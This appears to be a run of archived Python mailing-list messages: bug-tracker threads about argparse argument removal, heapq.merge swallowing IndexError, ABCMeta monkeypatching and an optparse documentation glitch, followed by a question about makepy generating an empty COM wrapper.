status: open title: Installer for mac doesn't store the installation location type: behavior versions: Python 3.2, Python 3.3, Python 3.4 ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue21613 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment: It does the trick with optionals but not the positionals. How the positional arguments can be removed/hidden? -- ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment: What is the way to 'hide' the argument from being parsed? E.g. we have self.parser.add_argument('foo') in parent class, how can we modify it in child class so that it would not to appear in --help strings and not populated to child's Namespace? -- ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment: Paul, essentialy, what i looking for is to replace the 'help' string of the inherited argument with the new one. If you say it could be changed without any effect so what would be the proper way to do it using argparse? Artem -- ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19462] Add remove_argument() method to argparse.ArgumentParser
New submission from Artem Ustinov: In order to migrate from optparse to argparse we need to have an ability to substitute anguments, e.g. remove and then create. In our framework we use the command line utility base class and then inherit the particular tools from it. The parser in base class uses add_argument() to populate the general argument list but for some tools it is needed to modify the inherited arguments set and make some arguments to have the modified meaning. With optparse we've just used remove_option() and then added the modified one with add_option() but argparse currently does not have this functionality. For the purpose above we just need to have remove_argument() or modify_argument() methods in orgparse -- components: Library (Lib) messages: 201832 nosy: ustinov priority: normal severity: normal status: open title: Add remove_argument() method to argparse.ArgumentParser type: enhancement versions: Python 3.2 ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment: We need argparse to raise an error for conflicting options and that's why we need to implicitly substitute an option when we need it On 31 Oct 2013 19:54, R. David Murray rep...@bugs.python.org wrote: R. David Murray added the comment: Does conflict_handler='resolve' address your use case? It sounds like it should. -- nosy: +r.david.murray ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ -- ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19462] Add remove_argument() method to argparse.ArgumentParser
Artem Ustinov added the comment: Explicitly substitute, excuse me On 31 Oct 2013 20:11, Artem Ustinov rep...@bugs.python.org wrote: Artem Ustinov added the comment: We need argparse to raise an error for conflicting options and that's why we need to implicitly substitute an option when we need it On 31 Oct 2013 19:54, R. David Murray rep...@bugs.python.org wrote: R. David Murray added the comment: Does conflict_handler='resolve' address your use case? It sounds like it should. -- nosy: +r.david.murray ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ -- ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ -- ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19462 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19018] Heapq.merge suppreses IndexError from user generator
New submission from Artem Fokin: Suppose we have the following code: from heapq import merge def iterable(): lst = range(10) for i in xrange(20): yield lst[i] it1, it2= iterable(), iterable() print list(merge(it1, it2)) # no IndexError #output is: [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9] The reason is that in heapq.merge http://hg.python.org/cpython/file/7c18b799841e/Lib/heapq.py#l372 try-catch clause for IndexError is too broad while 1: try: while 1: v, itnum, next = s = h[0] # raises IndexError when h is empty yield v s[0] = next() # raises StopIteration when exhausted, _heapreplace(h, s) # restore heap condition except _StopIteration: _heappop(h) # remove empty iterator except IndexError: return s[0] = next() also may raise different kinds of exceptions including IndexError which will be silently suppressed. For example, this loop can be rewritten as while 1: try: while 1: try: v, itnum, next = s = h[0] # raises IndexError when h is empty except IndexError: return yield v s[0] = next() # raises StopIteration when exhausted, _heapreplace(h, s) # restore heap condition except _StopIteration: _heappop(h) # remove empty iterator -- components: Library (Lib) messages: 197726 nosy: afn priority: normal severity: normal status: open title: Heapq.merge suppreses IndexError from user generator type: behavior versions: 3rd party, Python 2.6, Python 2.7, Python 3.1, Python 3.2, Python 3.3, Python 3.4, Python 3.5 ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19018 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19018] Heapq.merge suppreses IndexError from user generator
Changes by Artem Fokin ar.fo...@gmail.com: -- versions: -3rd party, Python 2.6, Python 3.4, Python 3.5 ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19018 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19018] Heapq.merge suppreses IndexError from user generator
Artem Fokin added the comment: Oh, it seems that in current cpython branch this problem is fixed by checking condition _len(h) 1: http://hg.python.org/cpython/file/1dc925ee441a/Lib/heapq.py#l373 But is it possible to fix it for the previous branches? -- ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19018 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue19018] Heapq.merge suppreses IndexError from user generator
Artem Fokin added the comment: Which branch should I add a unit-test to? Here is a patch that adds a unit-test to the current one. -- keywords: +patch Added file: http://bugs.python.org/file31760/unittest_patch.diff ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue19018 ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue13264] Monkeypatching using metaclass
New submission from Artem Tomilov scrapl...@gmail.com: from abc import ABCMeta class Meta(ABCMeta): def __instancecheck__(cls, instance): # monkeypatching class method cls.__subclasscheck__ = super(Meta, cls).__subclasscheck__ return super(Meta, cls).__instancecheck__(instance) def __subclasscheck__(cls, sub): return cls in sub.mro() class A(object): __metaclass__ = Meta class B(object): pass # registering class 'B' as a virtual subclass of 'A' A.register(B) issubclass(B, A) False isinstance(B(), A) # = method __subclasscheck__ is now monkeypatched True issubclass(B, A) # = desire to get 'True' because 'B' is a virtual subclass False -- components: None messages: 146366 nosy: Artem.Tomilov priority: normal severity: normal status: open title: Monkeypatching using metaclass type: behavior versions: Python 2.7 ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue13264 ___ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue7618] optparse library documentation has an insignificant formatting issue
New submission from Artem vazovsky@gmail.com: In optparse documentation, in the end of first chapter there is an example which shows how optparse can print usage summary for user. In the last row of this example text color is accidentally changed from black to blue. Most probably the source of this issue is single quote sign which is misinterpreted by the code highlighter. -- assignee: georg.brandl components: Documentation messages: 97119 nosy: georg.brandl, vazovsky severity: normal status: open title: optparse library documentation has an insignificant formatting issue versions: Python 3.1 ___ Python tracker rep...@bugs.python.org http://bugs.python.org/issue7618 ___ ___ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
makepy generates empty file
Hi I am trying to use makepy to generate wrappers from *.tlb for examples for GoogleDesktopSearch SDK (http://desktop.google.com/downloadsdksubmit). However makepy generates only very short __init__.py and no other files. Unfortunately, I am quite new both to Python and COM and can hardly guess what's wrong :( Please, help. Here is the contents of the generated __init__.py if it helps: # -*- coding: mbcs -*- # Created by makepy.py version 0.4.92 # By python version 2.4 (#60, Feb 9 2005, 19:03:27) [MSC v.1310 32 bit (Intel)] # From type library 'GoogleDesktopComponentSample1.dll' # On Sat Apr 09 01:48:14 2005 GoogleDesktopComponentSample1 1.0 Type Library makepy_version = '0.4.92' python_version = 0x20400f0 import win32com.client.CLSIDToClass, pythoncom import win32com.client.util from pywintypes import IID from win32com.client import Dispatch # The following 3 lines may need tweaking for the particular server # Candidates are pythoncom.Missing and pythoncom.Empty defaultNamedOptArg=pythoncom.Empty defaultNamedNotOptArg=pythoncom.Empty defaultUnnamedArg=pythoncom.Empty CLSID = IID('{3921D68F-6B14-4189-BA5D-2117A9DE67B6}') MajorVersion = 1 MinorVersion = 0 LibraryFlags = 8 LCID = 0x0 RecordMap = { } CLSIDToClassMap = {} CLSIDToPackageMap = { '{95DA1281-AEB5-45A4-A71A-B2E57EA41E0F}' : 'IndexShortcut', '{452FE2BF-D9C4-43FD-9137-78AE170C3EB3}' : 'IIndexShortcut', } VTablesToClassMap = {} VTablesToPackageMap = { '{452FE2BF-D9C4-43FD-9137-78AE170C3EB3}' : 'IIndexShortcut', } NamesToIIDMap = { 'IIndexShortcut' : '{452FE2BF-D9C4-43FD-9137-78AE170C3EB3}', } -- http://mail.python.org/mailman/listinfo/python-list